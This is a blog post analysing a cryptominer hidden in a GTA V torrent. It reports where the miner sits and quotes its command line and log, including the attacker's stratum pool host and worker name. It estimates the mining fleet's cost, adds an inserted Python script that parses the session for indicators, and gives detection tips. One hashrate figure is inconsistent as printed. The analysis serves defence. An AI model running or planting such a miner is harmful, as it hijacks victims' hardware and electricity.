Hidden Cryptominers in Game torrents

By Biersteker on Friday 19 June 2015 21:17 - Comments (15)
Category: -, Views: 6.878

Hiding coin miners in popular programs has been going on for quite some time now.
We have seen cryptominers as JavaScript on websites, and DVRs and NAS devices turned into Dogecoin miners. But the most common variant is simply hiding the miner in torrent releases. In this article we will look at one torrent in particular:
GTA V!

Why are we looking at GTA V?

Well, there are some good reasons for that.
1. If you can play GTA V on your PC, you have a rather modern system with enough CPU/GPU power.
2. It is one of the biggest game torrents at this time.
3. It's big, so most people will download one version but won't redownload 60 GB to find a second or third version.
4. It has a hidden miner in it.
Where is the miner hidden, what does it do?
http://i.imgur.com/XNoe7RV.png
In this case the miner is hidden in your Steam folder (a file mbm and some .cl kernel files). This is a modified version of sgminer.
http://i.imgur.com/lSQb8Y5.png
After some searching in the file, I found that the worker name is overltcx.<randomnumbers>, the algorithm is x11, and it connects to steam22865.net, which is a stratum proxy redirecting from pool to pool.

And of course the output of the mdm file.

code:
mdm --kernel x11mod -o stratum+tcp://steam22865.net:9001 -u overxltc.2161 -p x -I 13
[16:37:09] Started sgminer
[16:37:10] WARNING: GPU_MAX_ALLOC_PERCENT is not specified!
[16:37:10] WARNING: GPU_USE_SYNC_OBJECTS is not specified!
[16:37:10] Kernel x11mod is experimental.
[16:37:10] Probing for an alive pool
[16:37:10] Pool 0 difficulty changed to 0.015
[16:37:11] Network diff set to 3.2K
(5s):502.8K (avg):1.295Mh/s | A:0  R:0  HW:0  WU:0.000/m

If you find a miner on your computer you can capture its output, even if it is a background program, by changing the file extension to .exe, opening the folder in a command prompt, and running filename > output.txt.

Back to the output: x11mod?!?

X11 is a fairly widely used mining algorithm, but the coin with the biggest market cap and anonymity seemed like a good place to start. So, assuming it was mining Dash/DarkCoin, let's try a Google search on overxltc.
http://i.imgur.com/3T1IXnU.png

This resulted in finding a worker called overltcx at dash.coinmine.pl (and some very similar names). We also see overxltc and aliases mentioned in BSTY2 (GlobalBoost-Y) and Uro threads.

http://i.imgur.com/859rhAC.png
This is some scary hashrate.

As you can see, these workers produce an insane hashrate. So let's make a hardware calculation:

The used miner is sgminer, and the used kernel is darkcoin-mod-X11.

Let's take an average mid-to-high-end GPU like the AMD Radeon R9 280X, which will produce around 4.2 Mh/s using the darkcoin-mod-x11 kernel. (The kernel is important for estimating the number of rigs that are mining: if this miner used Wolf's X11 kernel, we would have to assume a 280X does 6 Mh/s.)

5.857 Mh/s divided by 4.2 Mh/s, the average hashrate of a 280X, makes a little under 1400 280X-like GPUs.
Normally a 280X draws about 15 watt idle, but when mining it will use around 250 watt.
(Source: http://www.tomshardware.c...270x-r7-260x,3635-18.html)

That means that every day since the malicious GTA V torrent was released, 235 watt (250 watt minus the 15 watt idle draw) x 1400 GPUs, around 0.33 megawatt, is needed. With power costs of $0.20 per kWh, the power costs for this amount of GPUs would be around $65.80 an hour, or $1579.20 daily.
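As an added worked example (not code from the original post), the script below pulls the pool host/port, worker name, kernel and reported hashrate out of a captured sgminer-style session like the one above, and repeats the hardware/power estimate for any per-GPU hashrate so the same arithmetic can be rerun for the Wolf kernel figure. The sample session is constructed from the lines in the post; the pool-wide "5.857 Mh/s" is read as 5857 Mh/s (thousands separator), which is the reading that yields the post's ~1400 GPUs.

```python
import re

# Constructed sample session, taken from the invocation and log lines in the post.
SAMPLE_SESSION = """\
mdm --kernel x11mod -o stratum+tcp://steam22865.net:9001 -u overxltc.2161 -p x -I 13
[16:37:09] Started sgminer
[16:37:10] Kernel x11mod is experimental.
[16:37:10] Pool 0 difficulty changed to 0.015
(5s):502.8K (avg):1.295Mh/s | A:0  R:0  HW:0  WU:0.000/m
"""

# sgminer-style command line: --kernel <name> -o stratum+tcp://<host>:<port> -u <worker>
CMD_RE = re.compile(
    r"--kernel\s+(?P<kernel>\S+).*?-o\s+stratum\+tcp://(?P<host>[^:\s]+):(?P<port>\d+)"
    r".*?-u\s+(?P<worker>\S+)"
)
# Status line, e.g. "(avg):1.295Mh/s"
RATE_RE = re.compile(r"\(avg\):(?P<val>[\d.]+)(?P<unit>[KMG])h/s")
UNIT = {"K": 1e3, "M": 1e6, "G": 1e9}


def parse_miner_session(text):
    """Extract pool host/port, worker, kernel and average hashrate (H/s) as triage indicators."""
    info = {}
    for line in text.splitlines():
        cmd = CMD_RE.search(line)
        if cmd:
            info.update(cmd.groupdict())
            info["port"] = int(info["port"])
        rate = RATE_RE.search(line)
        if rate:
            info["avg_hs"] = float(rate.group("val")) * UNIT[rate.group("unit")]
    return info


def estimate_fleet(pool_hs, gpu_hs, gpu_watts, usd_per_kwh):
    """The post's hand calculation: GPUs behind a pool-wide hashrate and what they cost to run."""
    gpus = pool_hs / gpu_hs
    kw = gpus * gpu_watts / 1000.0
    return {"gpus": gpus, "kw": kw, "usd_hour": kw * usd_per_kwh, "usd_day": kw * usd_per_kwh * 24}


if __name__ == "__main__":
    ioc = parse_miner_session(SAMPLE_SESSION)
    print(f"pool {ioc['host']}:{ioc['port']}  worker {ioc['worker']}  kernel {ioc['kernel']}")
    # 5857 Mh/s seen at the pool; 235 W per card above idle; $0.20 per kWh (figures from the post).
    for name, per_gpu in (("darkcoin-mod", 4.2e6), ("Wolf's kernel", 6.0e6)):
        est = estimate_fleet(5857e6, per_gpu, 235, 0.20)
        print(f"{name}: ~{est['gpus']:.0f} GPUs, {est['kw']:.0f} kW, ${est['usd_day']:.2f}/day")
```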

What can you do against unwanted miners?

1. First of all, you probably shouldn't download shady torrents that will cost you more than buying the game (power costs, hardware wear, PSUs that are not capable of handling the continuous load).
2. Run your own miner and check your hashrate. The sgminer miner in the torrent does not take priority over your own miners.
3. Check your GPU load! If your GPU load is high and your clock speeds are in performance mode without running anything heavy, that could be a sign that you have picked up an unwanted miner.
4. Removal instructions:
https://www.reddit.com/r/...ng_bitcion_miners_isssue/


In the end it is a question of who you would like to support: the game developers who made a good game, or the cracker/release group/repacker that abuses your GPU and does over 1500 dollars daily in economic damage?